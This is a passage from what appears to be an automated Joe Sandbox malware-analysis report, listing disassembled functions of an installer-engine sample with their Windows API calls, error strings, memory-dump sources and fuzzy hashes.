                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ArgvCommandErrorLastLine
                                                                                                                                                                                                                                                                                                  • String ID: apputil.cpp$ignored
                                                                                                                                                                                                                                                                                                  • API String ID: 3459693003-568828354
                                                                                                                                                                                                                                                                                                  • Opcode ID: ef73777553ad3ae3fea80d1db04a63b9244bf71b67080aa1f9a067d846d192eb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4fc05a9de32132e830bc29364174325916c34046cbd809ae2bcc5bdf830ecd2e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef73777553ad3ae3fea80d1db04a63b9244bf71b67080aa1f9a067d846d192eb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511BF76D00629EB8F21DB99C809D9EBBACFF05750B060155FD00E7312E731DE009AA0
                                                                                                                                                                                                                                                                                                  Function 0088D1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,0088D3EE,00000000,00000000,00000000,?), ref: 0088D1C3
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,0088D3EE,00000000,00000000,00000000,?), ref: 0088D24A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for message data, xrefs: 0088D212
                                                                                                                                                                                                                                                                                                  • NetFxChainer.cpp, xrefs: 0088D208
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2993511968-1624333943
                                                                                                                                                                                                                                                                                                  • Opcode ID: 19f4b17fcea239010d406a122bbb9a824a3fc7b9d8b9c228fa9ad23ad421092d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4acc63669599053630231e4f3565097ab4924e4b570070cf77971f8c952dacda
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19f4b17fcea239010d406a122bbb9a824a3fc7b9d8b9c228fa9ad23ad421092d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2311BFB1200215EFDB059F68D881E5ABBF5FF09724F104168F924DB792C731A810CB94
                                                                                                                                                                                                                                                                                                  Function 00861F69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(0086428F,0086548E,?,00000000,00000000,00000000,?,80070656,?,?,?,0087E75C,00000000,0086548E,00000000,80070656), ref: 00861F9A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0087E75C,00000000,0086548E,00000000,80070656,?,?,008740BF,0086548E,?,80070656,00000001,crypt32.dll), ref: 00861FA7
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,0087E75C,00000000,0086548E,00000000,80070656,?,?,008740BF,0086548E), ref: 00861FEE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1365068426-3612885251
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3b9b801ba7494aa85132b602efa69fdab949676f55740c2cc9ff71b25deea966
                                                                                                                                                                                                                                                                                                  • Instruction ID: 45f9643bc5f9a4080482a1f9ff53db8be1b520fe9819704b63eda0801115d0b7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b9b801ba7494aa85132b602efa69fdab949676f55740c2cc9ff71b25deea966
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B01A1B6D00129BBDB208FA4CC09ADFBAACFB05710F064165BD00F7211EB709E009AE0
                                                                                                                                                                                                                                                                                                  Function 00870721 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 00870791
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to update name and publisher., xrefs: 0087077B
                                                                                                                                                                                                                                                                                                  • Failed to update resume mode., xrefs: 00870762
                                                                                                                                                                                                                                                                                                  • Failed to open registration key., xrefs: 00870748
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-1865096027
                                                                                                                                                                                                                                                                                                  • Opcode ID: 14a0301e6e9183dcf7ad19f397e34add85eb0e1444a5835ec10bd40899a27b48
                                                                                                                                                                                                                                                                                                  • Instruction ID: 48dc45be27a464d8e24fe1b6890c7b45e11209e88752872c5597594429653f8d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14a0301e6e9183dcf7ad19f397e34add85eb0e1444a5835ec10bd40899a27b48
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD01D832940629F7DB169684DC46BEEBB69FB11B60F104151F504FA290C776FE10AFD1
                                                                                                                                                                                                                                                                                                  Function 008A4DB3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(008AB500,40000000,00000001,00000000,00000002,00000080,00000000,008704BF,00000000,?,0086F4F4,?,00000080,008AB500,00000000), ref: 008A4DCB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086F4F4,?,00000080,008AB500,00000000,?,008704BF,?,00000094,?,?,?,?,?,00000000), ref: 008A4DD8
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,0086F4F4,?,0086F4F4,?,00000080,008AB500,00000000,?,008704BF,?,00000094), ref: 008A4E2C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2528220319-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: aec41a15008555b6a9cdfc3c3f68488dfc0739c1e40593c5c1203dfd0cbeb2c5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 028ccfd843c066648de3feb800334568a436b6502f37ee75aefd018112d35c7b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aec41a15008555b6a9cdfc3c3f68488dfc0739c1e40593c5c1203dfd0cbeb2c5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D301D433641525ABEF225A689C05F5F3A54FB82B70F025310FF20EB5D1E7B09C2192E1
                                                                                                                                                                                                                                                                                                  Function 008A497A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,00888C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 008A49AE
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00888C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 008A49BB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorFileLast
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1214770103-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 90b1099262c492fad1abb3db1e7f4064b2fc317ae1dfbd7473527c3ace25b82b
                                                                                                                                                                                                                                                                                                  • Instruction ID: c2be4c02ec95577f8e079397f4f9ea5141655a34ff854a14e90240f77135f103
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90b1099262c492fad1abb3db1e7f4064b2fc317ae1dfbd7473527c3ace25b82b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A701F732680534B6FA2115955C0AF6B2D58FB82B71F164121FF51FA5E1D6F58C2051E1
                                                                                                                                                                                                                                                                                                  Function 00886BEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49serviceCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ControlService.ADVAPI32(00886AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,00886AFD,00000000), ref: 00886C13
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00886AFD,00000000), ref: 00886C1D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ControlErrorLastService
                                                                                                                                                                                                                                                                                                  • String ID: Failed to stop wusa service.$msuengine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4114567744-2259829683
                                                                                                                                                                                                                                                                                                  • Opcode ID: 42397af2d11af346aaf6714a3d2fd61b12788a87e8b99821fd29d69224eb8849
                                                                                                                                                                                                                                                                                                  • Instruction ID: 68334d59d99b3a15560982e85edbbf9babc354f55a485b595e5cac9831e7ebcc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42397af2d11af346aaf6714a3d2fd61b12788a87e8b99821fd29d69224eb8849
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57012B33A4173977D720EBA99C45AEFBBA4FB09B20F010025FD00FB280EA349C0186E5
                                                                                                                                                                                                                                                                                                  Function 0087ECC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadwindowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 0087ECED
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087ECF7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to post elevate message., xrefs: 0087ED25
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087ED1B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post elevate message.
                                                                                                                                                                                                                                                                                                  • API String ID: 2609174426-4098423239
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0db0b33ae3b1f3eca7bb157cb8e2199d1a30859a4c5ee8c6a0195a0107dbc85c
                                                                                                                                                                                                                                                                                                  • Instruction ID: ebe4ccc8a9507f7b0225f80f0831e483c72d989ca41412a1d634bb6703109f20
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0db0b33ae3b1f3eca7bb157cb8e2199d1a30859a4c5ee8c6a0195a0107dbc85c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F0F633A40235ABD7305A9C9C09B967B84FF08B30B21C2A4FE28EF295D765CC0186D5
                                                                                                                                                                                                                                                                                                  Function 0086D8DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0086D903
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,008648D7,00000000,?,?,0086548E,?,?), ref: 0086D912
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008648D7,00000000,?,?,0086548E,?,?), ref: 0086D91C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • BootstrapperApplicationDestroy, xrefs: 0086D8FB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                                                                                                                                                  • String ID: BootstrapperApplicationDestroy
                                                                                                                                                                                                                                                                                                  • API String ID: 1144718084-3186005537
                                                                                                                                                                                                                                                                                                  • Opcode ID: 125bcae2c73a447ee9a03aac47443c5ff2453571a842c4c02c5af6f66ab15f4d
                                                                                                                                                                                                                                                                                                  • Instruction ID: b3b06e074407e3fa99e80dc5bf6c417eae06d40b0a16697f5ffc2bfc0b6a0538
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 125bcae2c73a447ee9a03aac47443c5ff2453571a842c4c02c5af6f66ab15f4d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF06832B00726ABD3105F75D804B26FBA4FF057627028229E815D6521D761EC108BD0
                                                                                                                                                                                                                                                                                                  Function 0087F2D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 0087F2EE
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087F2F8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087F31C
                                                                                                                                                                                                                                                                                                  • Failed to post plan message., xrefs: 0087F326
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post plan message.
                                                                                                                                                                                                                                                                                                  • API String ID: 2609174426-2952114608
                                                                                                                                                                                                                                                                                                  • Opcode ID: 30c8f01aa1dde99c626c9dbedf1977f185b7f97bec5d10285e1d9bd3c1220d45
                                                                                                                                                                                                                                                                                                  • Instruction ID: d64939219579a6998681e41c1415ac7e341f109ee439e177c8d06b4c5c83f051
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30c8f01aa1dde99c626c9dbedf1977f185b7f97bec5d10285e1d9bd3c1220d45
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37F0A733A416316BE62166AAAC0AA8B7F84FF05B70F028021FE58EB382D665DC0085D5
                                                                                                                                                                                                                                                                                                  Function 0087F3E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 0087F3FC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087F406
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087F42A
                                                                                                                                                                                                                                                                                                  • Failed to post shutdown message., xrefs: 0087F434
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post shutdown message.
                                                                                                                                                                                                                                                                                                  • API String ID: 2609174426-188808143
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9e0edb9fe4a69b5a681a65f75341f23e6b4d4ed96734fe1e156779beb1f41988
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6d30536c0a7ec356df00dc7f21e0d10065e225bc02f33710e90fe9613e3270ab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e0edb9fe4a69b5a681a65f75341f23e6b4d4ed96734fe1e156779beb1f41988
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0A733A4163567D631569A6C0AF9B7B94FF05B70B028031BF18FB393E655DC0086D5
                                                                                                                                                                                                                                                                                                  Function 008807B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(008AB478,00000000,?,00881717,?,00000000,?,0086C287,?,00865405,?,008775A5,?,?,00865405,?), ref: 008807BF
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00881717,?,00000000,?,0086C287,?,00865405,?,008775A5,?,?,00865405,?,00865445,00000001), ref: 008807C9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 008807ED
                                                                                                                                                                                                                                                                                                  • Failed to set begin operation event., xrefs: 008807F7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorEventLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to set begin operation event.$cabextract.cpp
